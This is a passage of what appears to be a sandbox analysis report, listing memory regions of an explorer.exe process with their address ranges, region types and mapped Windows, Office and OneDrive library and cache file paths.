monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 673 start_va = 0x9440000 end_va = 0x94bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009440000" filename = "" Region: id = 674 start_va = 0x9540000 end_va = 0x95bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009540000" filename = "" Region: id = 675 start_va = 0x95c0000 end_va = 0x963ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095c0000" filename = "" Region: id = 676 start_va = 0x9640000 end_va = 0x96bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 677 start_va = 0x9740000 end_va = 0x97bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009740000" filename = "" Region: id = 678 start_va = 0x97c0000 end_va = 0x983ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097c0000" filename = "" Region: id = 679 start_va = 0x9840000 end_va = 0x993ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 680 start_va = 0x99c0000 end_va = 0x9a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099c0000" filename = "" Region: id = 681 start_va = 0x9a40000 end_va = 0x9abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 682 start_va = 0x9ac0000 end_va = 0x9b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ac0000" filename = "" Region: id = 683 start_va = 0x9b40000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b40000" filename = "" Region: id = 684 start_va = 0x9bc0000 end_va = 0x9c50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "uiribbonres.dll" filename = "\\Windows\\System32\\UIRibbonRes.dll" (normalized: "c:\\windows\\system32\\uiribbonres.dll") Region: id = 685 start_va = 0x9c60000 end_va = 0x9caefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009c60000" filename = "" Region: id = 686 start_va = 0x9d40000 end_va = 0xa13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 687 start_va = 0xa1c0000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1c0000" filename = "" Region: id = 688 start_va = 0xa240000 end_va = 0xa63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 689 start_va = 0xa7c0000 end_va = 0xa83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7c0000" filename = "" Region: id = 690 start_va = 0xa840000 end_va = 0xad31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a840000" filename = "" Region: id = 691 start_va = 0xad40000 end_va = 0xb03ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad40000" filename = "" Region: id = 692 start_va = 0xb050000 end_va = 0xb053fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 693 start_va = 0xb060000 end_va = 0xb060fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 694 start_va = 0xb070000 end_va = 0xb073fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 695 start_va = 0xb080000 end_va = 0xb080fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 696 start_va = 0xb090000 end_va = 0xb093fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 697 start_va = 0xb0a0000 end_va = 0xb0a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 698 start_va = 0xb0b0000 end_va = 0xb0b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 699 start_va = 0xb0c0000 end_va = 0xb0c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 700 start_va = 0xb1a0000 end_va = 0xb1a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 701 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 702 start_va = 0xb270000 end_va = 0xb270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b270000" filename = "" Region: id = 703 start_va = 0xb280000 end_va = 0xb37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 704 start_va = 0xb380000 end_va = 0xb47ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 705 start_va = 0xb480000 end_va = 0xb57ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 706 start_va = 0xbc40000 end_va = 0xbcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc40000" filename = "" Region: id = 707 start_va = 0xbf60000 end_va = 0xbfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bf60000" filename = "" Region: id = 708 start_va = 0xbfe0000 end_va = 0xc05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bfe0000" filename = "" Region: id = 709 start_va = 0xc0e0000 end_va = 0xc8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c0e0000" filename = "" Region: id = 710 start_va = 0xc8e0000 end_va = 0xc95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8e0000" filename = "" Region: id = 711 start_va = 0xc960000 end_va = 0xc9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c960000" filename = "" Region: id = 712 start_va = 0xce60000 end_va = 0xcedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce60000" filename = "" Region: id = 713 start_va = 0xcee0000 end_va = 0xcf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cee0000" filename = "" Region: id = 714 start_va = 0xcf60000 end_va = 0xcfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf60000" filename = "" Region: id = 715 start_va = 0xcfe0000 end_va = 0xd05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cfe0000" filename = "" Region: id = 716 start_va = 0xd060000 end_va = 0xd0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d060000" filename = "" Region: id = 717 start_va = 0xd0e0000 end_va = 0xd15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d0e0000" filename = "" Region: id = 718 start_va = 0xd160000 end_va = 0xd1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 719 start_va = 0xd1e0000 end_va = 0xd25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d1e0000" filename = "" Region: id = 720 start_va = 0xd460000 end_va = 0xd4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d460000" filename = "" Region: id = 721 start_va = 0xd860000 end_va = 0xe25ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d860000" filename = "" Region: id = 722 start_va = 0xe260000 end_va = 0xe751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e260000" filename = "" Region: id = 723 start_va = 0xe760000 end_va = 0x1137dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 724 start_va = 0x11380000 end_va = 0x11871fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011380000" filename = "" Region: id = 725 start_va = 0x118e0000 end_va = 0x1195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000118e0000" filename = "" Region: id = 726 start_va = 0x11960000 end_va = 0x119dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011960000" filename = "" Region: id = 727 start_va = 0x119e0000 end_va = 0x11a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119e0000" filename = "" Region: id = 728 start_va = 0x11a60000 end_va = 0x11adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011a60000" filename = "" Region: id = 729 start_va = 0x11ae0000 end_va = 0x11b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ae0000" filename = "" Region: id = 730 start_va = 0x11b60000 end_va = 0x11bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b60000" filename = "" Region: id = 731 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 732 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 733 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 734 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 735 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 736 start_va = 0x7ff6da190000 end_va = 0x7ff6da5d7fff monitored = 0 entry_point = 0x7ff6da22e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 737 start_va = 0x7ffd8d510000 end_va = 0x7ffd8e1dcfff monitored = 0 entry_point = 0x7ffd8d65e880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 738 start_va = 0x7ffd8eb10000 end_va = 0x7ffd8eb8efff monitored = 0 entry_point = 0x7ffd8eb117d0 region_type = mapped_file name = "dlnashext.dll" filename = "\\Windows\\System32\\dlnashext.dll" (normalized: "c:\\windows\\system32\\dlnashext.dll") Region: id = 739 start_va = 0x7ffd8eb90000 end_va = 0x7ffd8ecb6fff monitored = 0 entry_point = 0x7ffd8eb92130 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 740 start_va = 0x7ffd8f350000 end_va = 0x7ffd8f502fff monitored = 0 entry_point = 0x7ffd8f3b9be0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 741 start_va = 0x7ffd8f5e0000 end_va = 0x7ffd8f5fefff monitored = 0 entry_point = 0x7ffd8f5f54a0 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\System32\\DevDispItemProvider.dll" (normalized: "c:\\windows\\system32\\devdispitemprovider.dll") Region: id = 742 start_va = 0x7ffd8fc80000 end_va = 0x7ffd8fd2bfff monitored = 0 entry_point = 0x7ffd8fc859c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 743 start_va = 0x7ffd8fd90000 end_va = 0x7ffd8fddffff monitored = 0 entry_point = 0x7ffd8fdc1220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 744 start_va = 0x7ffd91280000 end_va = 0x7ffd9131bfff monitored = 0 entry_point = 0x7ffd912d96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 745 start_va = 0x7ffd91320000 end_va = 0x7ffd9136dfff monitored = 0 entry_point = 0x7ffd91331ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 746 start_va = 0x7ffd91430000 end_va = 0x7ffd91570fff monitored = 0 entry_point = 0x7ffd91435f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 747 start_va = 0x7ffd91580000 end_va = 0x7ffd916a0fff monitored = 0 entry_point = 0x7ffd91581cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 748 start_va = 0x7ffd916b0000 end_va = 0x7ffd91726fff monitored = 0 entry_point = 0x7ffd916b2af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 749 start_va = 0x7ffd91730000 end_va = 0x7ffd917c7fff monitored = 0 entry_point = 0x7ffd91753980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 750 start_va = 0x7ffd917d0000 end_va = 0x7ffd9186ffff monitored = 0 entry_point = 0x7ffd917f56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 751 start_va = 0x7ffd91870000 end_va = 0x7ffd918f1fff monitored = 0 entry_point = 0x7ffd91874ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 752 start_va = 0x7ffd91900000 end_va = 0x7ffd91c45fff monitored = 0 entry_point = 0x7ffd91908530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 753 start_va = 0x7ffd91c50000 end_va = 0x7ffd91cacfff monitored = 0 entry_point = 0x7ffd91c56c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 754 start_va = 0x7ffd91cb0000 end_va = 0x7ffd91e6ffff monitored = 0 entry_point = 0x7ffd91cb9e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 755 start_va = 0x7ffd91e70000 end_va = 0x7ffd91f12fff monitored = 0 entry_point = 0x7ffd91e84810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 756 start_va = 0x7ffd91f20000 end_va = 0x7ffd91f28fff monitored = 0 entry_point = 0x7ffd91f21b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 757 start_va = 0x7ffd91f30000 end_va = 0x7ffd91fb7fff monitored = 0 entry_point = 0x7ffd91f44510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 758 start_va = 0x7ffd91fc0000 end_va = 0x7ffd92202fff monitored = 0 entry_point = 0x7ffd91fc36c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 759 start_va = 0x7ffd92210000 end_va = 0x7ffd9221dfff monitored = 0 entry_point = 0x7ffd92211da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 760 start_va = 0x7ffd92220000 end_va = 0x7ffd9226ffff monitored = 0 entry_point = 0x7ffd9222be50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 761 start_va = 0x7ffd92270000 end_va = 0x7ffd92286fff monitored = 0 entry_point = 0x7ffd92272790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 762 start_va = 0x7ffd92290000 end_va = 0x7ffd922d1fff monitored = 0 entry_point = 0x7ffd92292230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 763 start_va = 0x7ffd922e0000 end_va = 0x7ffd92358fff monitored = 0 entry_point = 0x7ffd922e22d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 764 start_va = 0x7ffd92360000 end_va = 0x7ffd9236ffff monitored = 0 entry_point = 0x7ffd923678e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 765 start_va = 0x7ffd92370000 end_va = 0x7ffd923eafff monitored = 0 entry_point = 0x7ffd92373af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 766 start_va = 0x7ffd923f0000 end_va = 0x7ffd92549fff monitored = 0 entry_point = 0x7ffd923f4610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 767 start_va = 0x7ffd92590000 end_va = 0x7ffd925bdfff monitored = 0 entry_point = 0x7ffd92596580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 768 start_va = 0x7ffd92620000 end_va = 0x7ffd9281dfff monitored = 0 entry_point = 0x7ffd926216c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 769 start_va = 0x7ffd92820000 end_va = 0x7ffd92883fff monitored = 0 entry_point = 0x7ffd92826b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 770 start_va = 0x7ffd92930000 end_va = 0x7ffd9296dfff monitored = 0 entry_point = 0x7ffd92939650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 771 start_va = 0x7ffd96930000 end_va = 0x7ffd96951fff monitored = 0 entry_point = 0x7ffd96932580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 772 start_va = 0x7ffd969a0000 end_va = 0x7ffd969e7fff monitored = 0 entry_point = 0x7ffd969aa430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 773 start_va = 0x7ffd969f0000 end_va = 0x7ffd969fbfff monitored = 0 entry_point = 0x7ffd969f14b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 774 start_va = 0x7ffd96b30000 end_va = 0x7ffd96b8bfff monitored = 0 entry_point = 0x7ffd96b47190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 775 start_va = 0x7ffd96b90000 end_va = 0x7ffd96c26fff monitored = 0 entry_point = 0x7ffd96b9ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 776 start_va = 0x7ffd96c30000 end_va = 0x7ffd96c44fff monitored = 0 entry_point = 0x7ffd96c35740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 777 start_va = 0x7ffd96d00000 end_va = 0x7ffd96d13fff monitored = 0 entry_point = 0x7ffd96d03710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 778 start_va = 0x7ffd96db0000 end_va = 0x7ffd96dcdfff monitored = 0 entry_point = 0x7ffd96dbef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 779 start_va = 0x7ffd96dd0000 end_va = 0x7ffd96e4ffff monitored = 0 entry_point = 0x7ffd96dfd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 780 start_va = 0x7ffd96e90000 end_va = 0x7ffd96eb5fff monitored = 0 entry_point = 0x7ffd96ea5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 781 start_va = 0x7ffd96ec0000 end_va = 0x7ffd96eeafff monitored = 0 entry_point = 0x7ffd96ec4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 782 start_va = 0x7ffd96ef0000 end_va = 0x7ffd96f05fff monitored = 0 entry_point = 0x7ffd96ef1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 783 start_va = 0x7ffd96f30000 end_va = 0x7ffd96fb5fff monitored = 0 entry_point = 0x7ffd96f51e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 784 start_va = 0x7ffd97070000 end_va = 0x7ffd97149fff monitored = 0 entry_point = 0x7ffd970a3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 785 start_va = 0x7ffd97700000 end_va = 0x7ffd9781ffff monitored = 0 entry_point = 0x7ffd97738310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 786 start_va = 0x7ffd97840000 end_va = 0x7ffd97876fff monitored = 0 entry_point = 0x7ffd978420a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 787 start_va = 0x7ffd97880000 end_va = 0x7ffd9791dfff monitored = 0 entry_point = 0x7ffd978c9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 788 start_va = 0x7ffd97920000 end_va = 0x7ffd97936fff monitored = 0 entry_point = 0x7ffd9792c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 789 start_va = 0x7ffd97940000 end_va = 0x7ffd97b53fff monitored = 0 entry_point = 0x7ffd97941000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 790 start_va = 0x7ffd97b60000 end_va = 0x7ffd97dedfff monitored = 0 entry_point = 0x7ffd97c30f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 791 start_va = 0x7ffd97df0000 end_va = 0x7ffd97edefff monitored = 0 entry_point = 0x7ffd97e129cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 792 start_va = 0x7ffd97ee0000 end_va = 0x7ffd97f85fff monitored = 0 entry_point = 0x7ffd97f2efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 793 start_va = 0x7ffd97f90000 end_va = 0x7ffd9811efff monitored = 0 entry_point = 0x7ffd97fa01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: 